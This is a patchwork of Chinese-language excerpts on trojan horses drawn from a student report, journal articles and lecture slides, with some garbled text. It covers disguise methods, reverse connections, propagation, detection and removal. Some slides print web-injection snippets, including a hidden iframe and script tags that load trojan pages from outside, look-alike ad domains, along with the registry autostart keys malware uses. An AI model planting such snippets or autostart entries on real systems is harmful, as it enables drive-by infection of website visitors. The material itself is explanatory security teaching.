木马技术概述
毕业综合实践报告-计算机木马病毒及防治(防治版)
GDGM-QR-03-077-B/1Guangdong College of Industry & Commerce毕业综合实践报告Graduation synthesis practice report题目:计算机木马病毒及防治(in En glish) Computer Trojan virus research and prevention系别:班级:学生姓名:学号:指导老师:完成日期:目录一、计算机木马病毒的概述及现状 (1)(一)计算机木马病毒的概念 (1)(二)木马病毒的原理 (1)(三)木马病毒的特征 (3)(四)木马病毒的危害 (3)(五)计算机木马病毒发展 (4)二、计算机木马病毒的伪装方式 (5)(一)修改图标 (5)(二)捆绑文件 (5)(三)出错显示 (5)(四)定制端口 (5)(五)自我销毁 (5)(六)木马更名 (6)三、计算机木马病毒的防治 (6)(一)如何查出木马 (6)1、检测网络连接 (6)2、禁用不明服务 (6)3、检查系统账户 (6)4、对比系统服务项 (7)(二)如何删除木马病毒 (7)1、禁用系统还原 (7)2、安全模式或VGA模式 (8)(三)如何防范木马病毒 (8)1、截断传染源 (8)2、加强计算机防护 (8)3、善用账号保护工具 (8)四、几款免费的木马专杀工具 (9)(一)冰刃 (9)(二)Windows清理助手 (9)(三)恶意软件清理助手 (9)(四)Atool软件 (9)(五)Windows恶意软件删除工具(mrt.exe) (10)五、结束语 (10)参考文献 (11)内容提要随着信息化时代的到来人类社会生活对因特网的需求日益增长,使得计算机网络技术迅速发展和普及。
因特网使得全世界都联系到了一起。
极大的促进了全球一体化的发展。
但是随着互联网的普及和应用的不断发展,各种黑客工具和网络手段导致网络和用户收到财产损失,其中最严重的就是木马攻击手段。
木马的生存技术
福建电脑2010年第4期(下转第74页)木马的生存技术王勇刚(孝感学院计算机与信息科学学院湖北孝感432000)【摘要】:本文先介绍木马技术,然后从更名换姓、文件捆绑、冒充图片、修改图标四个方面分析了木马的伪装技术,最后从加壳、修改特征码、加花等方面,分析和介绍了木马的生存技术。
【关键词】:木马;伪装;免杀1、木马技术木马以其隐蔽性强,变化迅速以及窃取文件等手段成为当前网络信息系统面临的安全威胁中危害最为严重的攻击手段之一。
木马其实就是一个网络客户/服务程序。
网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听,如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序我们称为守护进程。
就我们前面所讲的木马来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供服务。
木马之间传递信息主要是通过端口来进行的。
端口即控制端和服务端之间的数据入口,通过这个入口,数据可直达控制端程序或木马程序。
我们这里所说的端口,不是计算机硬件的I/O 端口,而是软件形式上的概念。
例如,大家浏览网站时就是通过访问服务器的80端口来实现的。
2、木马的伪装技术作为病毒中利用率最高的木马,它的伪装技术也是一流的。
主要有下列几种方式。
伪装方法一:给木马服务端程序更名,木马服务端程序的命名有很大的学问。
木马的命名千奇百怪。
不过大多是改为和系统文件名差不多的名字,如果对系统文件不够了解,那可就危险了。
例如有的木马把名字改为window.exe ,如果不告诉用户这是木马的话,谁也不敢删除。
还有的就是更改一些后缀名,比如把dll 改为d11等(注意看是数字"11"而非英文字母"ll"),不仔细看的话,就不会发现。
伪装方法二:把自己和其它文件捆绑在一起,这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷地进入了系统。
计算机病毒与木马技术深度剖析
特性
—功能的特殊性 通常的木马功能都是十分特殊的,除了普通的 文件操作以外,还有些木马具有搜索cache中的口令、
设置口令、扫描目标机器人的IP地址、进行键盘记
录、远程注册表的操作以及锁定鼠标等功能。远程 控制软件当然不会有这些功能,毕竟远程控制软件 是用来控制远程机器,方便自己操作而已,而不是 用来黑对方的机器的。
Presentation Identifier Goes Here 11
伪装方法
木马更名 木马服务端程序的命名也有很大的学问。如果 不做任何修改,就使用原来的名字,谁不知道这是
个木马程序呢?所以木马的命名也是千奇百怪,不过
大多是改为和系统文件名差不多的名字,如果你对 系统文件不够了解,那可就危险了。例如有的木马
3
程序
程序就是一组指令执行序列
如:“原材料获取初步加工精细加零配件组装验收合格检 验(入库)不合格(销毁)” 不同季度、不同情况时采用不同的执行的程序
程序就是一张计划书,记载着先做什么后做 什么,木马其实就是具有破坏后果的程序
如:收集火药买雷管制成炸弹放置到公共场合引爆”
15
4、Ntldr又将系统由原来的16位实模式切换到32位保护模式 或64位长模式。它的工作是读取根目录下的Boot.ini文件, 显示引导菜单。它首先会加载Ntoskrnl.exe、Hal.dll,接
着读入注册表的SYSTEM键文件,从中找出自动启动的各
类驱动程序。 5、Ntoskrnl.exe(或Ntkrnlpa.exe)是内核程序,xp启动 时的LOGO动画,它做的工作实在是太多了,它的最后一 步工作就是创建会话管理子系统,也就是由System进程创
14
系统引导过程
特洛伊木马
• 木马通道与远程控制
– 木马连接建立后,控制端端口和服务端木马端口之间将会出现一 条通道 – 控制端上的控制端程序可藉这条通道与服务端上的木马程序取得 联系,并通过木马程序对服务端进行远程控制,实现的远程控制 就如同本地操作
控制端 控制端 程序 1096 6267 服务端 木马 程序 窃取密码 文件操作 修改注册表 系统操作
32
网页挂马技术(二)
• js调用型网页挂马
– 利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术
<script language=javascript
src=/gm.js></script>
/gm.js就是一个js脚本文件,通过它调用和执行木 马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关 的选项就可以了
5
木马入侵基本过程
控制端 ①配置木马 ②传播木马 ③运行木马 Internet 木马 服务端
④信息反馈
信息
⑤建立连接
⑥远程控制
6
netstat查看木马打开的端口
Proto ① TCP ② TCP Local Address 202.102.47.56 : 6267 202.102.47.56 : 6267 服务端 IP地址 木马 端口 Foreign Address 202.96.96.102 : 1096 0.0.0.0 控制端 IP地址 控制端 端口 State ESTABLISHED LISTENING 连接状态: ①连接已建立 ②等待连接
33
网页挂马技术(三)
• 图片伪装挂马
– 攻击者直接将网页木马加载到图片中
/test.htm中的木马代码植入到test.jpg图片文件中
网页木马机理与防御技术
网页木 马多被用 于让 客户端 过路式 下载“ 盗号木 马” , 窃取 客户端个 人信 息, 它 已经 成为 黑客谋求 经济利 益 的重 要工具 . 围绕着 网页 木马逐渐 形成 了具有 一定规 模、分 工 明确 的地 下经济链 : 股 票账 号、信用 卡账 号乃至
特性, 并总结 防御方的研 究现 状 以及探 讨攻防双方 的发展趋势, 为进一步研 究作参考. 本文第 1 节 介绍 网页木马工 作机制, 主要包括 网页木 马定义 、典 型攻击流程 、漏洞利用 机理及 些 提高攻 击成 功率 、增强 自身 隐蔽性方 面的对抗 手段. 第 2节从监 测 、特 征分析 、防范这 3方面对 网页木马 防御方 的研
J o u r n a l o fS o f t w a r e软件 学报 V o 1 . 2 4 , N o . 4 , Ap r i l 2 0 1 3
网页木 马是近年来 出现的一种 新形态 的恶意代码 , 它通 常被人 为置入 We b服务器 端的 H T ML页面 中, 目的 在 于 向客 户端传播 恶意程 序: 客户 端访 问该页面 时, 它 利用 客户端 浏览器及 其插件 的漏洞 将恶 意程序 自动植入 客 户端 . 网页木 马的表 现形 式是 一个或 一组 有链接 关 系、含 有( 用 J a v a S c r i p t等脚 本语 言编 写 的) 恶意 代码 的 HT ML页面, 恶意代码在 该( 组) 页面被客户 端浏览器 加载 、渲 染的过程 中被执行 并利用浏 览器及插件 中的漏洞 隐蔽地下 载 、安 装 、执 行病毒 或 间谍 软件 等恶意可 执行 文件. 网页木 马是一 种客户 端攻击 方式, 相 比较蠕虫 等 通 过 网络 主动进行 自我复 制、 自我 传播, 网页木 马部署在 网站服 务器端, 在用户 浏览页面 时发起 攻击. 这种客 户 端攻击 方式可 以有效 地绕过 防火墙 的检测 , 隐蔽地 、有效地在 客户 端植入 恶意代码 , 进 而在 用户不 知情 的情 况 下 自动完 成恶意可执 行文件 的下载 、 执行, 国外将这种 攻击方 式称为 Dr i v e — b y — Do wn l o a d (  ̄ , 内直 译为“ 过路式 下
木马的7种分类
木马的7种分类随着计算机技术的不断发展,木马病毒也不断地演化和发展,出现了各种不同类型的木马病毒,本文将介绍木马病毒的七种基本分类。
1.远程控制木马远程控制木马可以通过网络,远程控制受感染电脑的操作系统。
黑客可以远程操作受害者的计算机,以获取其个人信息、机密资料和密码等。
这种木马病毒非常隐蔽,很难被发现,因此危害性相对较大。
2.间谍木马间谍木马主要用于监控用户的行动,例如记录用户的浏览历史记录、键盘输入等。
这种木马病毒通常会将窃取到的数据发送给黑客来实现监控。
3.下载木马下载木马病毒具有下代码、过滤HTML代码等功能,可以从远程服务器下载感染电脑所需的程序或文件。
当这种木马病毒感染到用户的计算机后,可以在后台下载恶意程序或软件。
4.钓鱼木马钓鱼木马通常通过电子邮件、社交网络等方式来欺骗受害者,使其下载木马病毒。
这种木马病毒的危害性非常高,因为它可以窃取受害者的个人信息,例如社交网络的用户账户和密码、银行账户信息等。
5.后门木马后门木马是指在计算机上预留出的一些未经授权的入口,可以让黑客在未经授权的情况下远程访问受害者的计算机系统。
这种木马病毒可以在用户不知情的情况下进行远程控制,非常隐蔽,难以发现。
6.窃密木马窃密木马可以获取用户的账户和密码等个人信息,并将这些信息上传到黑客服务器。
这种木马病毒通常隐藏在诱骗受害者下载的文件、恶意链接等背后。
7.多功能木马多功能木马是一种综合了多种木马病毒功能的复合木马病毒。
它可以通过网络来获取用户的个人信息、远程访问受害者计算机、窃取银行账号密码等敏感信息。
这种木马病毒的危害性非常高,可以严重威胁用户的安全和隐私。
(7)特洛伊木马及防范技术
反弹端口
反弹端口型木马分析了防火墙的特性后发现: 防火墙对于连入的链接往往会进行非常严格的过 滤,但是对于连出的链接却疏于防范。于是,与 一般的木马相反,反弹端口型木马的服务端(被 控制端)使用主动端口,客户端(控制端)使用 被动端口,木马定时监测控制端的存在,发现 控 制端上线立即弹出端口主动连结控制端打开的主 动端口,为了隐蔽起见,控制端的被动端口一般 开在80,这样,即使用户使用端口扫描软件检查 自己的端口,发现的也是类似 TCP UserIP:1026 ControllerIP:80 ESTABLISHED的情况,稍微疏 忽一点你就会以为是自己在浏览网页。
•
信息安全研究中心
木马的一般入侵过程
• 制造木马 设计、编码、配置 • 传播安装 浏览网页、下载软件、上网聊天、发送邮件 • 启动木马 自动启动、关联启动、驱动木马、dll木马 • 建立链接 固定端口、可变端口、反弹端口、ICMP • 远程控制 远程监控、文件操作、系统修改
信息安全研究中心
特洛依木马及防范技术
信息安全研究中心
通讯技术
• 寄生端口(重用端口):将木马的通信连接绑定在通用 端口上(比如80),通过这些服务端口发送信息。因为 木马实际上是寄生在已有的系统服务之上的,因此,扫 描或查看系统端口的时候是没有任何异常的。 反弹端口(反向连接):反弹端口型木马的服务端(被 控制端)使用主动端口,客户端(控制端)使用被动端 口,木马定时监测控制端的存在,发现 控制端上线立即 弹出端口主动连结控制端打开的主动端口。 不用端口:使用ICMP协议进行通讯。由于ICMP报文由 系统内核或进程直接处理因而不通过端口传递数据。
信息安全研究中心
特洛伊木马
木马又称特洛伊木马(trojan horse),它是一种远程控制类黑 客工具。木马的运行模式属于C/S模式,它包括两大部分,即客户端 和服务端。其原理是一台主机提供服务(服务器),另一台主机接受服 务(客户机),作为服务器的主机一般会打开一个默认的端口进行监听。 如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程 序就会自动运行,来应答客户机的请求。
木马程序开发技术:病毒源代码详解
⽊马程序开发技术:病毒源代码详解近年来,⿊客技术不断成熟起来,对⽹络安全造成了极⼤的威胁,⿊客的主要攻击⼿段之⼀,就是使⽤⽊马技术,渗透到对⽅的主机系统⾥,从⽽实现对远程操作⽬标主机。
其破坏⼒之⼤,是绝不容忽视的,⿊客到底是如何制造了这种种具有破坏⼒的⽊马程序呢,下⾯我对⽊马进⾏源代码级的详细的分析,让我们对⽊马的开发技术做⼀次彻底的透视,从了解⽊马技术开始,更加安全的管理好⾃⼰的计算机。
1、⽊马程序的分类 ⽊马程序技术发展⾄今,已经经历了4代,第⼀代,即是简单的密码窃取,发送等,没有什么特别之处。
第⼆代⽊马,在技术上有了很⼤的进步,冰河可以说为是国内⽊马的典型代表之⼀。
第三代⽊马在数据传递技术上,⼜做了不⼩的改进,出现了ICMP等类型的⽊马,利⽤畸形报⽂传递数据,增加了查杀的难度。
第四代⽊马在进程隐藏⽅⾯,做了⼤的改动,采⽤了内核插⼊式的嵌⼊⽅式,利⽤远程插⼊线程技术,嵌⼊DLL线程。
或者挂接PSAPI,实现⽊马程序的隐藏,甚⾄在Windows NT/2000下,都达到了良好的隐藏效果。
相信,第五代⽊马很快也会被编制出来。
关于更详细的说明,可以参考ShotGun的⽂章《揭开⽊马的神秘⾯纱》。
2.⽊马程序的隐藏技术 ⽊马程序的服务器端,为了避免被发现,多数都要进⾏隐藏处理,下⾯让我们来看看⽊马是如何实现隐藏的。
说到隐藏,⾸先得先了解三个相关的概念:进程,线程和服务。
我简单的解释⼀下。
进程:⼀个正常的Windows应⽤程序,在运⾏之后,都会在系统之中产⽣⼀个进程,同时,每个进程,分别对应了⼀个不同的PID(Progress ID, 进程标识符)这个进程会被系统分配⼀个虚拟的内存空间地址段,⼀切相关的程序操作,都会在这个虚拟的空间中进⾏。
线程:⼀个进程,可以存在⼀个或多个线程,线程之间同步执⾏多种操作,⼀般地,线程之间是相互独⽴的,当⼀个线程发⽣错误的时候,并不⼀定会导致整个进程的崩溃。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
。
• 第五代木马反弹式木马。
木马实例演示 (example of a simple Trojan)
• 演示木马:灰鸽子 • 简介 灰鸽子,学名为win32.hack.huigezi,是国内一款著名后门程序 ; 比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者 ,功能强大,有6万多种变种; 开发者是葛军,该木马的客户端和服务端都是采用Dephi编写 ; 服务端对客户端连接方式有多种,使得处于各种网络环境的用 户都可能中毒,包括局域网用户(通过代理上网)、公网用户 和ADSL拨号用户等; 使用了进程隐藏、线程注入、重复加壳等多种病毒技术,连续 三年被国内各大杀毒厂商评选为“年度十大病毒”。
• 命令广播:可以对自动上线主机进行命令广播,如关 机、重启、打开网页,筛选符合条件的机等,点一个 按钮就可以让N台机器同时关机或其它操作; • 消息广播:可以向对方主机发送消息;
木马植入方法(propagation mechanisms)
直接攻击
电子邮件
经过伪装的 木马被植入 目标机器
ቤተ መጻሕፍቲ ባይዱ
文件下载
浏览网页
例子(CVE2010-0249,Operation Aurora)
• • • • • • • • function Get(){ var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else {document.cookie = "Cookie1=risb;expires="+ Then.toGMTString() • document.writeln("<iframe src=http://pagead2.googlesyndication.xx.xx/pagead/aur ora.htm width=0 height=0></iframe>"); • }}Get();
b)RunServicesOnce注册表服务项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunServicesOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\RunServicesOnce (3)修改系统配置文件 a)在Win.ini中启动 在Win.ini的[windows]字段中有启动命令“load=”和 “run=”,在一般情况下“=”后面是空白的,如果有 后跟程序,比方说是这个样子: run=c:\windows\file.exe load=c:\windows\file.exe file.exe就会在计算机启动的时候启动。
合并文件
+
QQ等
1、直接攻击法 利用系统漏洞(如MS06-14、MS07-17和MS07004,MS08-067),通过端口扫描,漏洞扫描和网络渗 透,将木马程序发送并安装到远程计算机中,这种方 法方便、快捷,攻击效果比较明显,很多病毒都是通 过这种方法进行传播。 2、文件下载法 将木马程序与软件捆绑在一起,或者将木马伪装成破解 工具、漂亮的屏保、图像文件或游戏程序等,放在FTP 服务器、WEB站点或者BT站点提供下载,当用户下载 并打开或者运行这些文件的同时安装了木马。 3、U盘传染法 利用Windows的自动播放功能,双击该U盘以后,木马就 自动运行,并成功植入到目标用户机器中。
c)Winlogon注册表启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon d)Load注册表启动项 HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\Curr entVersion\Windows\load (2)注册成系统服务 a ) RunServices注册表服务项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\RunServices
例子(CVE2010-0188)
例子(CVE2010-0188)
木马的行为特征 Q:How you can know if you are under Trojan horse attack?
木马的运行主要分为两个阶段:
一是木马植入阶段,主要是指木马安装时,释 放服务端文件以及修改系统信息; 二是木马植入后阶段,这主要是指木马成功安 装并运行后,具有了系统操作、通信等行为 特征。
灰鸽子木马强大功能
• 对远程计算机文件管理: 模仿Windows 资源管理器,可以对文件进行复制、粘 贴、删除,重命名、远程运行等,可以上传下载文件或 文件夹,操作简单易用; • 远程控制命令: 查看远程系统信息、剪切板查看、进程管理、窗口管理 、插件功能、服务管理(包括启动服务、停止服务、删 除服务、设置服务)、共享管理(包括查看共享、新建共 享、删除共享)、代理服务、MS-Dos模拟; • 捕获屏幕: 不但可以连续的捕获远程电脑屏幕,还能把本地的鼠标 及键盘传动作送到远程实现实时控制功能; • 视频监控: 可以控制远程计算机的摄像头,在服务端操作人员完 全不知情的情况下,控制端可以把摄像头目标中的拍 摄下来;
木马技术概述
内容提要
木马的概念,特点与分类 木马发展历史 木马实例演示 木马植入方法 木马行为特征 木马程序分析示例 木马设计 木马分析与木马检测 总结
木马概念
• 木马的典故: 木马,全称为“特洛伊木马”(trojan horse),其得 名于公元前十二世纪初 “特洛伊战争 ” • 木马,完成特殊任务的程序其实质只是一个在隐蔽、 非授权情况下安装和运行的网络客户端/服务器程序。 • 客户端:又叫控制端,对服务端进行远程控制的 一方 • 服务端:被控制端远程控制的一方
3、电子邮件传播法 第一种是通过邮件附件进行传播。 第二种通过邮件内容进行传播。 4、网页挂马法(CVE2010-0249,Operation Aurora,0day) CVE - Common Vulnerabilities and Exposures 这种方法是目前最流行的木马植入方法,主要是利用IE 浏览器的漏洞进行传播的,攻击者在网页上加入溢出 代码,用户在浏览网页或者点击某一个链接时,IE浏览 器溢出,溢出以后恶意代码就可以自动从网站的指定 位置下载木马文件并执行 5、应用软件漏洞法(CVE2009-4324, CVE2010-0188) 将木马文件绑定在Word、Excel、PowerPoint、Access、 pdf、Winrar等文档中,通过QQ、GoogleTalk、MSN等 P2P聊天工具或者电子邮件将这些文件发送给目标用户, 目标用户正常打开这些文档的同时,绑定在这些文档 中的木马就自动运行。
• 现在一般都是服务端主动连接客户端
• 木马的工作流程
木马的特点
• 隐藏性,
– – – – (1)在任务栏中隐藏,不产生任何窗口 (2)在任务管理器里隐藏 (3)木马文件的隐藏 (4)木马通信的隐藏
• 自启动性, • 自恢复功能
– 木马会在多处留下备份,如果其中某些文件被查杀 以后,会通过备份再次激活,或者感染其他的正常 文件,木马也会再次激活。
木马的分类
• 按功能分类
– 远程控制型木马--如:灰鸽子、冰河 – 密码盗窃型木马--如:阿拉QQ大盗 – 恶作剧型木马
• 按连接方式分类
– 正向连接型木马--如:冰河 – 反弹式木马--如:网络神偷,灰鸽子
• 按通信协议分类
– TCP木马:主流,如BO、冰河等 – UDP木马:利用UDP协议进行数据传送 – ICMP木马:利用ICMP协议进行数据传送,如lionbackdoor
木马植入阶段
1、自启动设置 (1)在注册表设置自启动项 a)Run注册表启动项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run b)RunOnce注册表启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunOnce WindowsXPHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunOnceEx
6、社会工程学法 通过各种方法获取目标用户的信任,然后通过向对方发 绑定了木马的文件引诱对方点击,或者直接在他机器上 运行木马。
推荐读物——《入侵的艺术》 by Kevin Mitnick
例子(CVE2010-0249)
• 要入侵网站拿到网站的webshell • 在网页上插入挂马代码 • 看下面代码,模仿的谷歌广告代码调用的脚本地址, 而且是调用的图片,如果不仔细看是看不出来的。只 要在网页上插入这么一段代码,马挂上了。 • <script src=http://pagead2.googlesyndication.xx.xx/pagead/log o.gif></script> • 这个图片地址空间是挂马者自己的租用的空间,域名 模仿了一些知名网络服务的域名,目的就是让人不易 察觉